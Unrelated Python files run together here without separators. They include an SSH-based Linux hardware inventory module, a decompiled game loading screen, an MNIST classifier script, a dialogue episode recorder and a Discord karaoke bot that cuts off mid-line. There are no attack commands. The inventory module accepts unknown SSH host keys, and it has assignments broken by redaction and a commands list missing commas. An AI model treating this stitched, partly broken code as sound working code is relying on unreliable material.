self._record_transform(transformed_sample) # convert to input type out_data = harmonizer.get_output(transformed_sample) return out_data @abstractmethod def apply_transform(self, sample): pass @property def name(self): return self.__class__.__name__ @property def is_invertible(self): return hasattr(self, 'invert') ### ------ # Transform Recording & Replication # ----- ### def _record_transform(self, transformed_sample): reproducing_args = self.get_reproducing_arguments() transformed_sample.record_transform(reproducing_args) def get_reproducing_arguments(self): """ Return a dictionary with the arguments that would be necessary to reproduce the transform exactly (arguments are from previous transform). """ reproducing_arguments = { 'name': self.name, 'include_keys': self.include_keys, 'exclude_keys': self.exclude_keys, 'copy': self.copy, 'p': self.p } t_args = {name: getattr(self, name) for name in self.transform_args} reproducing_arguments.update(t_args) return reproducing_arguments module_linux.py import os import ast import math import paramiko commands = ['cat /dev/null', 'dmidecode -V', 'fdisk -V', 'find --version', 'grep -V', 'hdparm -V', 'hostname', 'id', 'ifconfig -V', 'ip -V', 'lshal -V' 'python2 -h', 'python3 -V', 'sort --version' 'sudo -V', 'wc --version'] class GetLinuxData: def __init__(self, base_url, username, secret, ip, ssh_port, timeout, usr, pwd, use_key_file, key_file, get_serial_info, add_hdd_as_device_properties, add_hdd_as_parts, add_nic_as_parts, get_hardware_info, get_os_details, get_cpu_info, get_memory_info, ignore_domain, ignore_virtual_machines, upload_ipv6, give_hostname_precedence, debug): self.d42_api_url = base_url self.d42_username = username self.d42_password = self.machine_name = ip self.port = int(ssh_port) self.timeout = timeout self.username = usr self.password = self.use_key_file = use_key_file self.key_file = key_file self.get_serial_info = get_serial_info self.get_hardware_info = get_hardware_info self.get_os_details = get_os_details self.get_cpu_info = get_cpu_info self.get_memory_info = get_memory_info self.ignore_domain = ignore_domain self.ignore_virtual_machines = ignore_virtual_machines self.upload_ipv6 = upload_ipv6 self.name_precedence = give_hostname_precedence self.add_hdd_as_devp = add_hdd_as_device_properties self.add_hdd_as_devp = False # do not edit, take a look at the inventory.config.example for details self.add_hdd_as_parts = add_hdd_as_parts self.add_nic_as_parts = add_nic_as_parts self.debug = debug self.root = True self.devicename = None self.disk_sizes = {} self.raids = {} self.hdd_parts = [] self.nic_parts = [] self.device_name = None self.os = None self.paths = {} self.nics = [] self.alldata = [] self.devargs = {} self.ssh = paramiko.SSHClient() self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) def main(self): self.connect() self.get_cmd_paths() self.are_u_root() if self.add_nic_as_parts: self.nic_parts = self.get_physical_nics() self.alldata.append(self.nic_parts) dtype = self.get_system() if dtype == 'virtual' and self.ignore_virtual_machines: return self.alldata if self.get_memory_info: self.get_ram() if self.get_cpu_info: self.get_cpu() if self.get_os_details: self.get_os() self.get_hdd() self.get_ip_ipaddr() self.get_ip_ipmi() self.alldata.append(self.devargs) if self.add_hdd_as_parts: self.alldata.append({'hdd_parts': self.hdd_parts}) if self.add_nic_as_parts: self.alldata.append({'nic_parts': self.nic_parts}) return self.alldata def connect(self): try: if not self.use_key_file: self.ssh.connect(str(self.machine_name), port=self.port, username=self.username, password=self.password, timeout=self.timeout) else: self.ssh.connect(str(self.machine_name), port=self.port, username=self.username, key_filename=self.key_file, timeout=self.timeout) except paramiko.AuthenticationException: print str(self.machine_name) + ': authentication failed' return None except Exception as err: print str(self.machine_name) + ': ' + str(err) return None def get_cmd_paths(self): search_paths = ['/usr/bin', '/bin', '/usr/local/bin', '/sbin', '/usr/sbin', '/usr/local/sbin'] for cmd_to_find in commands: for search_path in search_paths: cmd_path = "%s/%s" % (search_path, cmd_to_find) data_out, data_err = self.execute(cmd_path, False) if not data_err: self.paths.update({cmd_to_find.split()[0]: search_path}) break if 'command not found' in data_err: if self.debug: print '\t[-] Failed to find command "%s" at path "%s"' % (cmd_to_find, search_path) def find_command_path(self, cmd_to_find): search_paths = ['/usr/bin', '/bin', '/usr/local/bin', '/sbin', '/usr/sbin', '/usr/local/sbin'] for search_path in search_paths: cmd_path = "%s/%s" % (search_path, cmd_to_find) data_out, data_err = self.execute(cmd_path, False) if not data_err: self.paths.update({cmd_to_find:search_path}) return search_path if 'command not found' in data_err: if self.debug: print '\t[-] Failed to find command "%s" at path "%s"' % (cmd_to_find, search_path) def execute(self, cmd, needroot=False): if needroot: if self.root: stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=30) else: if 'sudo' in self.paths: cmd_sudo = "%s/sudo -S -p '' %s" % (self.paths['sudo'],cmd) cmd_sudo = "sudo -S -p '' %s" % cmd stdin, stdout, stderr = self.ssh.exec_command(cmd_sudo, timeout=30) stdin.write('%s\n' % self.password) stdin.flush() else: stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=30) data_err = stderr.readlines() try: data_out = stdout.readlines() except UnicodeDecodeError: data_x = stdout.read() data_out = data_x.split('\n') if data_err and 'sudo: command not found' in str(data_err): stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=30) data_err = stderr.readlines() data_out = stdout.readlines() return data_out, data_err def are_u_root(self): if 'id' in self.paths: cmd = '%s/id -u' % self.paths['id'] else: cmd = 'id -u' data, err = self.execute(cmd) if data[0].strip() == '0': self.root = True else: self.root = False @staticmethod def to_ascii(s): try: return s.encode('ascii', 'ignore') except Exception as err: print '[?] to_ascii exception: ' + str(err) return None @staticmethod def closest_memory_assumption(v): if v < 512: v = 128 * math.ceil(v / 128.0) elif v < 1024: v = 256 * math.ceil(v / 256.0) elif v < 4096: v = 512 * math.ceil(v / 512.0) elif v < 8192: v = 1024 * math.ceil(v / 1024.0) else: v = 2048 * math.ceil(v / 2048.0) return int(v) def get_name(self): if 'hostname' in self.paths: cmd = '%s/hostname' % self.paths['hostname'] else: cmd = 'hostname' data_out, data_err = self.execute(cmd) device_name = None if not data_err: if self.ignore_domain: device_name = self.to_ascii(data_out[0].rstrip()).split('.')[0] else: device_name = self.to_ascii(data_out[0].rstrip()) if device_name != '': self.devargs.update({'name': device_name}) if self.name_precedence: self.devargs.update({'new_name': device_name}) return device_name return device_name def get_system(self): self.device_name = self.get_name() if self.device_name not in ('', None): if 'dmidecode' in self.paths: cmd = '%s/dmidecode -t system' % self.paths['dmidecode'] else: cmd = 'dmidecode -t system' data_out, data_err = self.execute(cmd, True) if not data_err: dev_type = None for rec in data_out: if rec.strip() not in ('\n', ' ', '', None): rec = rec.strip() if rec.startswith('Manufacturer:'): manufacturer = rec.split(':')[1].strip() self.devargs.update({'manufacturer': manufacturer}) if manufacturer in ['VMware, Inc.', 'Bochs', 'KVM', 'QEMU', 'Microsoft Corporation', 'Xen', 'innotek GmbH']: dev_type = 'virtual' if self.ignore_virtual_machines and dev_type == 'virtual': self.devargs.clear() return 'virtual' else: self.devargs.update({'type': dev_type}) if rec.startswith('UUID:'): uuid = rec.split(':')[1].strip() self.devargs.update({'uuid': uuid}) if rec.startswith('Serial Number:'): serial = rec.split(':')[1].strip() if self.get_serial_info: self.devargs.update({'serial_no': serial}) if rec.startswith('Product Name:') and dev_type != 'virtual': hardware = rec.split(':')[1].strip() self.devargs.update({'hardware': hardware}) else: if self.debug: print '\t[-] Failed to get sysdata from host: %s using dmidecode. Message was: %s' % \ (self.machine_name, str(data_err)) self.get_system_2() def get_system_2(self): if 'grep' in self.paths: cmd = "%s/grep '' /sys/devices/virtual/dmi/id/*" % self.paths['grep'] else: cmd = "grep '' /sys/devices/virtual/dmi/id/*" data_out, data_err = self.execute(cmd, True) if data_out: dev_type = 'physical' for rec in data_out: if 'sys_vendor:' in rec: manufacturer = rec.split(':')[1].strip() self.devargs.update({'manufacturer': manufacturer}) if manufacturer in ['VMware, Inc.', 'Bochs', 'KVM', 'QEMU', 'Microsoft Corporation', 'Xen', 'innotek GmbH']: dev_type = 'virtual' if self.ignore_virtual_machines and dev_type == 'virtual': self.devargs.clear() return 'virtual' else: self.devargs.update({'type': dev_type}) if 'product_uuid:' in rec: uuid = rec.split(':')[1].strip() self.devargs.update({'uuid': uuid}) if 'product_serial:' in rec: serial = rec.split(':')[1].strip() if self.get_serial_info: self.devargs.update({'serial_no': serial}) if 'product_name:' in rec and dev_type != 'virtual': hardware = rec.split(':')[1].strip() self.devargs.update({'hardware': hardware}) else: if self.debug: print '\t[-] Failed to get sysdata from host: %s using grep /sys.... Message was: %s' % \ (self.machine_name, str(data_err)) self.get_system_3() def get_system_3(self): if 'lshal' in self.paths: cmd = "%s/lshal -l -u computer" % self.paths['lshal'] else: cmd = "lshal -l -u computer" data_out, data_err = self.execute(cmd) if data_out: dev_type = None for rec in data_out: if 'system.hardware.vendor' in rec: manufacturer = rec.split('=')[1].split('(')[0].strip() self.devargs.update({'manufacturer': manufacturer}) if manufacturer in ['VMware, Inc.', 'Bochs', 'KVM', 'QEMU', 'Microsoft Corporation', 'Xen', 'innotek GmbH']: dev_type = 'virtual' if self.ignore_virtual_machines and dev_type == 'virtual': self.devargs.clear() return 'virtual' else: self.devargs.update({'type': dev_type}) if 'system.hardware.uuid' in rec: uuid = rec.split('=')[1].split('(')[0].strip() self.devargs.update({'uuid': uuid}) if 'system.hardware.serial' in rec: serial = rec.split('=')[1].split('(')[0].strip() if self.get_serial_info: self.devargs.update({'serial_no': serial}) if 'system.hardware.product' in rec and dev_type != 'virtual': hardware = rec.split('=')[1].split('(')[0].strip() self.devargs.update({'hardware': hardware}) else: if self.debug: print '\t[-] Failed to get sysdata from host: %s using lshal. Message was: %s' % \ (self.machine_name, str(data_err)) def get_ram(self): if 'grep' in self.paths: cmd = '%s/grep MemTotal /proc/meminfo' % self.paths['grep'] else: cmd = 'grep MemTotal /proc/meminfo' data_out, data_err = self.execute(cmd) if not data_err: memory_raw = ''.join(data_out).split()[1] memory = self.closest_memory_assumption(int(memory_raw) / 1024) self.devargs.update({'memory': memory}) else: if self.debug: print '\t[-] Could not get RAM info from host %s. Message was: %s' % (self.machine_name, str(data_err)) def get_os(self): if 'python2' in self.paths: cmd = '%s/python -c "import platform; raw = list(platform.dist());raw.append(platform.release());print raw"'\ % self.paths['python2'] else: cmd = 'python -c "import platform; raw = list(platform.dist());raw.append(platform.release());print raw"' data_out, data_err = self.execute(cmd) if not data_err: if 'command not found' not in data_out[0]: # because some distros sport python3 by default! self.os, ver, release, kernel_version = ast.literal_eval(data_out[0]) self.devargs.update({'os': self.os}) self.devargs.update({'osver': ver if ver else 'D42_NULL'}) self.devargs.update({'osverno': kernel_version}) return else: if 'python3' in self.paths: cmd = '%s/python3 -c "import platform; raw = list(platform.dist());raw.append(platform.release());' \ 'print (raw)"' % self.paths['python3'] else: cmd = 'python3 -c "import platform; raw = list(platform.dist());' \ 'raw.append(platform.release());print (raw)"' data_out, data_err = self.execute(cmd) if not data_err: self.os, ver, release, kernel_version = ast.literal_eval(data_out[0]) self.devargs.update({'os': self.os}) self.devargs.update({'osver': ver}) self.devargs.update({'osverno': kernel_version}) return else: if self.debug: print '\t[-] Could not get OS info from host %s. Message was: %s' % ( self.machine_name, str(data_err)) if data_err and 'command not found' in data_err[0]: if 'python3' in self.paths: cmd = '%s/python3 -c "import platform; raw = list(platform.dist());' \ 'raw.append(platform.release());print (raw)"' % self.paths['python3'] else: cmd = 'python3 -c "import platform; raw = list(platform.dist());' \ 'raw.append(platform.release());print (raw)"' data_out, data_err = self.execute(cmd) if not data_err: self.os, ver, release, kernel_version = ast.literal_eval(data_out[0]) self.devargs.update({'os': self.os}) self.devargs.update({'osver': ver}) self.devargs.update({'osverno': kernel_version}) return else: if self.debug: print '\t[-] Could not get OS info from host %s. Message was: %s' % ( self.machine_name, str(data_err)) else: if self.debug: print '\t[-] Could not get OS info from host %s. Message was: %s' % (self.machine_name, str(data_err)) def get_cpu(self): processors = self.get_cpu_num() if 'cat' in self.paths: cmd = '%s/cat /proc/cpuinfo' % self.paths['cat'] else: cmd = 'cat /proc/cpuinfo' data_out, data_err = self.execute(cmd) if not data_err: cores = 1 cpuspeed = 0 for rec in data_out: if rec.startswith('cpu MHz'): cpuspeed = int((float(rec.split(':')[1].strip()))) if rec.startswith('cpu cores'): cores = int(rec.split(':')[1].strip()) self.devargs.update({'cpucount': processors}) self.devargs.update({'cpucore': cores}) self.devargs.update({'cpupower': cpuspeed}) else: if self.debug: print '\t[-] Could not get CPU info from host %s. Message was: %s' % (self.machine_name, str(data_err)) def get_cpu_num(self): if 'cat' in self.paths: cat_path = self.paths['cat'] + '/cat' else: cat_path = 'cat' if 'grep' in self.paths: grep_path = self.paths['grep'] + '/grep' else: grep_path = 'grep' if 'sort' in self.paths: sort_path = self.paths['sort'] + '/sort' else: sort_path = 'sort' if 'wc' in self.paths: wc_path = self.paths['wc'] + '/wc' else: wc_path = 'wc' cmd = '%s /proc/cpuinfo | %s "physical id" | %s -u | %s -l' % (cat_path, grep_path, sort_path, wc_path) data_out, data_err = self.execute(cmd) if not data_err: cpu_num = ''.join(data_out).strip() return cpu_num else: return 0 def get_ip_ipmi(self): data_out, data_err = self.execute('ipmitool lan print 1') mac = None ip = None if not data_err: for row in data_out: if 'MAC Address' in row: mac_data = row.split() if len(mac_data) > 2: mac = mac_data[3] elif 'IP Address' in row and 'Source' not in row: ip_data = row.split(':') if len(ip_data) > 1: ip = ip_data[1].strip() if ip and mac: self.ip_to_json('ipmi', mac, ip, '') else: if self.debug: print '\t[-] Could not get IPMI IP info from host %s. Message was: %s' % (self.machine_name, str(data_err)) def get_ip_ifconfig(self): if 'ifconfig' in self.paths: cmd = '%s/ifconfig' else: cmd = '/sbin/ifconfig' data_out, data_err = self.execute(cmd) if not data_err: new = True nic = mac = ip = ip6 = '' for row in data_out: if row not in ('', '\n', None): if not row.startswith(' '): if new: nic = row.split()[0].strip(':').strip() new = False else: if not nic.startswith('lo'): self.ip_to_json(nic, mac, ip, ip6) nic = row.split()[0].strip(':') new = True if 'HWaddr ' in row: words = row.split() macindex = words.index('HWaddr') + 1 mac = words[macindex].strip() else: new = False if 'inet addr:' in row: words = row.split() ipindex = words.index('inet') + 1 ip = words[ipindex].strip('addr:').strip() elif 'inet ' in row and 'addr:' not in row: words = row.split() ipindex = words.index('inet') + 1 ip = words[ipindex].strip() # debian/ubuntu if 'inet6 addr:' in row and row.split()[-1].lower() != 'scope:link': ip6 = row.split()[2] if '%' in ip6: ip6 = ip6.split('%')[0] if '/' in ip6: ip6 = ip6.split('/')[0] if ip6 and ip6 == '::1': ip6 = '' # redhat/centos elif 'inet6 ' in row and 'addr:' not in row and '' not in row and '' not in row: ip6 = row.split()[1] if '%' in ip6: ip6 = ip6.split('%')[0] if '/' in ip6: ip6 = ip6.split('/')[0] if ip6 and ip6 == '::1': ip6 = '' if 'ether ' in row: words = row.split() macindex = words.index('ether') + 1 mac = words[macindex].strip() if not nic.startswith('lo'): self.ip_to_json(nic, mac, ip, ip6) else: if self.debug: print '\t[-] Could not get IP info from host %s. Message was: %s' % (self.machine_name, str(data_err)) def ip_to_json(self, nic, mac, ip, ip6): macdata = {} nicdata = {} nicdata_v6 = {} nicdata.update({'device': self.device_name}) nicdata_v6.update({'device': self.device_name}) macdata.update({'device': self.device_name}) nicdata.update({'tag': nic}) nicdata_v6.update({'tag': nic}) macdata.update({'port_name': nic}) nicdata.update({'macaddress': mac}) nicdata_v6.update({'macaddress': mac}) macdata.update({'macaddress': mac}) nicdata.update({'ipaddress': ip}) nicdata_v6.update({'ipaddress': ip6}) # if ip != '': self.alldata.append(nicdata) if ip6 != '': self.alldata.append(nicdata_v6) if mac != '': self.alldata.append(macdata) def get_ip_ipaddr(self): if 'ip' in self.paths: cmd = '%s/ip addr show' % self.paths['ip'] else: cmd = 'ip addr show' data_out, data_err = self.execute(cmd) if not data_err and 'command not found' not in data_out[0]: macmap = {} ipmap = {} ip6map = {} nics = [] nicmap = {} current_nic = None for rec in data_out: # macs if not rec.startswith(' ') and rec not in ('', '\n'): if ':' in rec: mac = None raw = rec.split(':') try: nic = raw[1].strip() if '@' in nic: nic = nic.split('@')[0] current_nic = nic rec_index = data_out.index(rec) mac_word = data_out[rec_index + 1] if 'link/ether' in mac_word: parts = mac_word.split() if len(parts) >= 4: mac = parts[1] if nic != 'lo' and mac: macmap.update({nic: mac}) if self.add_nic_as_parts: if nic in self.nic_parts: self.nic_parts[nic]["serial_no"]=mac except IndexError: pass # get nic names and ips elif rec.strip().startswith('inet ') and 'scope global' in rec: inetdata = rec.split() ip = inetdata[1].split('/')[0] interface = inetdata[-1] if ':' in interface: macmap.update({interface: macmap[interface.split(':')[0]]}) nics.append(interface) ipmap.update({interface: ip}) elif rec.strip().startswith('inet6 ') and 'scope global' in rec: inetdata = rec.split() ip = inetdata[1].split('/')[0] interface = current_nic if ':' in interface: macmap.update({interface: macmap[interface.split(':')[0]]}) nicmap.update({interface: current_nic}) ip6map.update({interface: ip}) # jsonize for nic in nics: nicdata = {} nicdata_v6 = {} macdata = {} if nic in macmap: mac = macmap[nic] macdata.update({'device': self.device_name}) macdata.update({'port_name': nic}) macdata.update({'macaddress': mac}) if nic in ipmap: ip = ipmap[nic] nicdata.update({'device': self.device_name}) nicdata.update({'tag': nic}) nicdata.update({'ipaddress': ip}) if nic in macmap: mac = macmap[nic] nicdata.update({'macaddress': mac}) if nic in ip6map: ip6 = ip6map[nic] nicdata_v6.update({'device': self.device_name}) nicdata_v6.update({'tag': nic}) nicdata_v6.update({'ipaddress': ip6}) if nic in macmap: mac = macmap[nic] nicdata_v6.update({'macaddress': mac}) if nicdata: self.alldata.append(nicdata) if nicdata_v6: self.alldata.append(nicdata_v6) if macdata: self.alldata.append(macdata) else: if self.debug: print '\t[-] Could not get NIC info from host %s. Switching to "ifconfig".' \ '\n\t\t Message was: %s' % (self.machine_name, str(data_err)) self.get_ip_ifconfig() def get_hdd(self): hdds = self.get_hdd_names() hw_hdds = [x for x in hdds if '/mapper' not in x] if hw_hdds: if self.add_hdd_as_devp : self.devargs.update({'hddcount': len(hw_hdds)}) for hdd in hw_hdds: hdd_part = self.get_hdd_info_hdaparm(hdd) if hdd_part: self.hdd_parts.append(hdd_part) def get_hdd_names(self): if 'fdisk' in self.paths: fdisk_path = self.paths['fdisk'] + '/fdisk' else: fdisk_path = 'fdisk' if 'grep' in self.paths: grep_path = self.paths['grep'] + '/grep' else: grep_path = 'grep' hdd_names = [] cmd = '%s -l | %s -v "ram\|mapper" | %s "Disk /dev"' % (fdisk_path, grep_path, grep_path) data_out, data_err = self.execute(cmd, True) errhdds = [] if data_err: for rec in data_err: if "doesn't contain a valid partition table" in rec: disk = rec.split()[1] errhdds.append(disk) for rec in data_out: try: mess = rec.strip().split() disk = mess[1] if disk.endswith(':'): disk_name = disk.strip(':') else: disk_name = disk sizeformat = mess[3].lower().strip(',') size = float(mess[2]) if self.add_hdd_as_devp: self.devargs.update({'hddsize': size}) if sizeformat in ('mib', 'mb'): size = int(math.ceil(size / 1024)) if self.add_hdd_as_devp: self.devargs.update({'hddsize': size}) hdd_names.append(disk_name) self.disk_sizes.update({disk_name: size}) except Exception as err: print '[?] get_hdd_names exception: ' + str(err) return hdd_names def get_hdd_info_hdaparm(self, hdd): if 'hdparm' in self.paths: cmd = '%s/hdparm -I %s' % (self.paths['hdparm'], hdd) else: cmd = 'hdparm -I %s' % hdd data_out, data_err = self.execute(cmd, True) if data_err: if self.debug: print '[-] Error in get_hdd_info_hdaparm() for IP: %s . Message was: %s' % (self.machine_name, data_err) return else: hdd_part = {} for rec in data_out: if 'model number' in rec.lower(): model = rec.split(':')[1].strip() size = self.disk_sizes[hdd] hdd_part.update({'device': self.device_name, 'assignment': 'device'}) hdd_part.update({'name': model}) hdd_part.update({'type': 'hdd'}) hdd_part.update({'hddsize': size}) if 'serial number' in rec.lower(): serial = rec.split(':')[1].strip() hdd_part.update({'serial_no': serial}) if 'transport:' in rec.lower(): if ',' in rec: try: transport = (rec.split(',')[-1]).split()[0] except IndexError: transport = (rec.split(',')[-1]) else: transport = rec.lower() hdd_part.update({'hddtype': transport}) if 'rotation rate' in rec.lower(): rpm = rec.split(':')[1].strip() if not rpm == 'Solid State Device': hdd_part.update({'hddrpm': rpm}) else: hdd_part.update({'hddtype': 'SSD'}) return hdd_part def get_physical_nics(self): if 'find' in self.paths: cmd = "%s/find /sys/devices/pci0000:00 -name net -exec ls '{}' \; -exec dirname '{}' \;" % self.paths['find'] else: cmd = "find /sys/devices/pci0000:00 -name net -exec ls '{}' \; -exec dirname '{}' \;" nics = {} device_name = self.get_name() data_out, data_err = self.execute(cmd) if not data_err: for i in range(0, len(data_out), 2): nic = data_out[i].strip() path = self.check_nic_path(data_out[i + 1].strip()) vendor_code = self.get_nic_vendor_code(path) vendor_subcode = self.get_nic_vendor_subcode(path) model_code = self.get_nic_model_code(path) model_subcode = self.get_nic_model_subcode(path) nics.update({nic:{"manufacturer":vendor_code, "name": model_code, "serial_no": None, "device": device_name, "model_subcode": model_subcode, "manufacturer_subcode": vendor_subcode}}) else: if self.debug: print '[!] Error in get_physical_nics(). Message was: %s' % data_err return nics def check_nic_path(self, path): path_parts = os.path.split(path) # ssb patch try: if 'ssb' in path_parts[-1]: new_path = '/'.join(path_parts[0:-1]) return new_path else: return path except Exception as err: print '[?] check_nic_path exception: ' + str(err) def get_nic_vendor_code(self, path): if 'cat' in self.paths: cmd = "%s/cat %s/vendor" % (self.paths['cat'],path) else: cmd = "cat %s/vendor" % path data_out, data_err = self.execute(cmd) if not data_err: vendor_code = ''.join(data_out).strip()[2:] return vendor_code def get_nic_vendor_subcode(self, path): if 'cat' in self.paths: cmd = "%s/cat %s/subsystem_vendor" % (self.paths['cat'],path) else: cmd = "cat %s/subsystem_vendor" % path data_out, data_err = self.execute(cmd) if not data_err: vendor_subcode = ''.join(data_out).strip()[2:] return vendor_subcode def get_nic_model_code(self, path): if 'cat' in self.paths: cmd = "%s/cat %s/device" % (self.paths['cat'],path) else: cmd = "cat %s/device" % path data_out, data_err = self.execute(cmd) if not data_err: model_code = ''.join(data_out).strip()[2:] return model_code def get_nic_model_subcode(self, path): if 'cat' in self.paths: cmd = "%s/cat %s/subsystem_device" % (self.paths['cat'],path) else: cmd = "cat %s/subsystem_device" % path data_out, data_err = self.execute(cmd) if not data_err: sub_code = ''.join(data_out).strip()[2:] return sub_code # uncompyle6 version 3.2.4 # Python bytecode 2.7 (62211) # Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)] # Embedded file name: lib.coginvasion.gui.CILoadingScreen from direct.gui.DirectGui import OnscreenText from direct.directnotify.DirectNotifyGlobal import directNotify from direct.showbase.Transitions import Transitions from lib.coginvasion.base import FileUtility loadernotify = directNotify.newCategory('CILoadingScreen') class CILoadingScreen: def __init__(self): self.transitions = Transitions(loader) def createMenu(self): base.graphicsEngine.renderFrame() base.graphicsEngine.renderFrame() self.version_lbl = OnscreenText(text='ver-' + game.version, scale=0.06, pos=(-1.32, -0.97, -0.97), align=TextNode.ALeft, fg=(0.9, 0.9, 0.9, 7)) def beginLoadGame(self): phasesToScan = [ 'models', 'phase_3/models', 'phase_3.5/models', 'phase_4/models'] self.models = FileUtility.findAllModelFilesInVFS(phasesToScan) for model in self.models: loader.loadModel(model) loader.progressScreen.tick() doneInitLoad() self.destroy() def loadModelDone(self, array): self.modelsLoaded += 1 if self.modelsLoaded == len(self.models): doneInitLoad() self.destroy() def destroy(self): self.version_lbl.destroy()import numpy as np from datetime import datetime import pandas as pd import sys sys.path.append('../../mypackages/') import utils def mnist_data(file, train): df = pd.read_csv(file) data = df.as_matrix() np.random.shuffle(data) if train: X = data[:, 1:] / 255.0 # data is from 0..255 Y = data[:, 0] return X, Y else: X = data[:, :] / 255.0 # data is from 0..255 return X try: size except NameError: X, y = mnist_data('/Users/frangy/Documents/DataAna/kaggle_data/mnist_train.csv',1) kaggle_test = mnist_data('/Users/frangy/Documents/DataAna/kaggle_data/mnist_test.csv',0) size=len(y) test_perc=0.8 # perc size of test sample X_train, X_test, y_train, y_test = utils.resize(X, y, test_perc) kaggle_predict=0 findbest=0 #if findbest: # hidden_layer_sizes,activation,solver,learning_rat = utils.best_mlp_cl(X, y) #else: # hidden_layer_sizes = (100, ) # activation = "relu" # solver = "sgd" # learning_rate ="constant" clf_rf = utils.svm_rbf(X_train, y_train) y_pred = clf_rf.predict(X_train) print(y_pred) print('Training score:') utils.get_accuracy_cl(y_pred, y_train) y_pred = clf_rf.predict(X_test) print('Testing score:') utils.get_accuracy_cl(y_pred, y_test) #Training score: #(' Score :', 0.934047619047619, '\n Pos_ok:', 2348, 'False Neg:', 0, ' Pos error:', 0.0, '%\n Neg_ok:', 1966, 'False_pos:', 0, ' Neg error:', 0.0, '%') #Testing score: #(' Score :', 0.9287142857142857, '\n Pos_ok:', 2248, 'False Neg:', 1, ' Pos error:', 0.0, '%\n Neg_ok:', 2067, 'False_pos:', 0, ' Neg error:', 0.0, '%') #SLOW! # Use current model to get prediction for the Kaggle test sample: #if kaggle_predict: # results = model.predict(kaggle_test) # f = open('mlp_prediction.txt', 'w') # f.write('ImageId,Label\n') # for i, r in enumerate(results): # s = str(i+1)+str(',')+str(r)+str('\n') # f.write(s) # f.close() dertilo/dialogue-systems0 """ Copyright (c) 2019 Uber Technologies, Inc. Licensed under the Uber Non-Commercial License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at the root directory of this project. See the License for the specific language governing permissions and limitations under the License. """ from dataclasses import dataclass from typing import List from dialog_action_classes import DialogueAct from State import SlotFillingDialogueState __author__ = "" from copy import deepcopy import pickle import os import datetime """ The DialogueEpisodeRecorder is responsible for keeping track of the dialogue experience. It has some standard fields and provides a custom field for any other information we may want to keep track of. """ @dataclass class TurnState: state: SlotFillingDialogueState = None action: List[DialogueAct] = None reward: float = None success: bool = None @dataclass class Experience: state: SlotFillingDialogueState new_state: SlotFillingDialogueState action: List[DialogueAct] = None reward: float = None success: str = None cumulative_reward: float = None input_utterance: str = None output_utterance: str = None custom: str = None class DialogueEpisodeRecorder: def __init__(self, size=None, path=None): self.dialogues: List[List[Experience]] = [] self.size = size self.current_dialogue: List[Experience] = None self.cumulative_reward = 0 self.path = path if path: self.load(path) def set_path(self, path): self.path = path def record( self, new_state, turnstate: TurnState, input_utterance=None, output_utterance=None, force_terminate=False, custom=None, ): # TODO: what does len(actions)==0 mean ?? self.cumulative_reward += turnstate.reward # Check if a dialogue is starting or ending if self.current_dialogue is None: self.current_dialogue = [] self.current_dialogue.append( Experience( state=deepcopy(turnstate.state), new_state=deepcopy(new_state), action=deepcopy(turnstate.action), reward=deepcopy(turnstate.reward), input_utterance=deepcopy(input_utterance) if input_utterance else "", output_utterance=deepcopy(output_utterance) if output_utterance else "", success="", cumulative_reward=deepcopy(self.cumulative_reward), custom=deepcopy(custom) if custom else "", ) ) if turnstate.state.is_terminal() or force_terminate: if turnstate.success is not None: self.current_dialogue[-1].success = turnstate.success # Check if maximum size has been reached if self.size and len(self.dialogues) >= self.size: self.dialogues = self.dialogues[(len(self.dialogues) - self.size + 1) :] self.dialogues.append(self.current_dialogue) self.current_dialogue = [] self.cumulative_reward = 0 def save(self, path=None): if not path: path = self.path if not path: path = f"Logs/Dialogues{datetime.datetime.now().isoformat()}.pkl" print("No Log file name provided. Using default: {0}".format(path)) obj = {"dialogues": self.dialogues} try: with open(path, "wb") as file: pickle.dump(obj, file, pickle.HIGHEST_PROTOCOL) except IOError: raise IOError( "Dialogue Episode Recorder I/O Error when " "attempting to save!" ) def load(self, path): if not path: print( "WARNING! Dialogue Episode Recorder: No Log file provided " "to load from." ) if self.dialogues: print( "WARNING! Dialogue Episode Recorder is not empty! Loading " "on top of existing experience." ) if isinstance(path, str): if os.path.isfile(path): print(f"Dialogue Episode Recorder loading dialogues from " f"{path}...") with open(path, "rb") as file: obj = pickle.load(file) if "dialogues" in obj: self.dialogues = obj["dialogues"] print("Dialogue Episode Recorder loaded from {0}.".format(path)) else: print( "Warning! Dialogue Episode Recorder Log file %s not " "found" % path ) else: print( "Warning! Unacceptable value for Dialogue Episode Recorder " "Log file name: %s " % path ) cpjuank/discord_karaokekaraoke.py import discord from discord.ext import commands import os import pendulum import calendar PREFIX = "--" Client = discord.Client() bot = commands.Bot(command_prefix=PREFIX, pm_help = False) bot.remove_command("help") userListPerServer = {} tz = pendulum.timezone('US/Mountain') @bot.event async def on_ready(): print("Bot is ready!") @bot.command(pass_context=True) async def join(ctx): user = ctx.message.author userList = getServerList(ctx.message.server.id) if user not in userList: userList.append(user) await sayList(userList) @bot.command(pass_context=True) async def leave(ctx): user = ctx.message.author userList = getServerList(ctx.message.server.id) userList.remove(user) await sayList(userList) @bot.command(pass_context=True) async def q(ctx): userList = getServerList(ctx.message.server.id) await sayList(userList) @bot.command(pass_context=True) async def sing(ctx): if await isAdmin(ctx.message.author): userList = getServerList(ctx.message.server.id) if len(userList) > 0: userToJump = None args = ctx.message.content.split(" ") if len(args) == 2: userIndex = int(args[1])-1 singJump(userList, userIndex) else: singNext(userList) await sayList(userList) if len(userList) > 0: userOnTop = userList[0] await bot.say("<@{}> Sing!".format(userOnTop.id)) @bot.command(pass_context=True) async def remove(ctx): if await isAdmin(ctx.message.author): userList = getServerList(ctx.message.server.id) args = ctx.message.content.split(" ") userIndex = int(args[1])-1 if userIndex >= 0 and userIndex < len(userList): userList.pop(userIndex) await sayList(userList) @bot.command(pass_context=True) async def clear(ctx): if await isAdmin(ctx.message.author): userList = getServerList(ctx.message.server.id) userList.clear() await sayList(userList) @bot.command() async def help(*args): description = ("\n") description += "**{}join** - Join the queue \n".format(PREFIX) description += "**{}leave** - Leave the queue \n".format(PREFIX) description += "**{}q** - Show the queue \n".format(PREFIX) description += "**{}sing** - Admin command. Next singer in line or singer by position \n".format(PREFIX) description += "**{}remove** - Admin command. Remove a singer by position \n".format(PREFIX) description += "**{}clear** - Admin command. Clear the queue \n".format(PREFIX) embed = 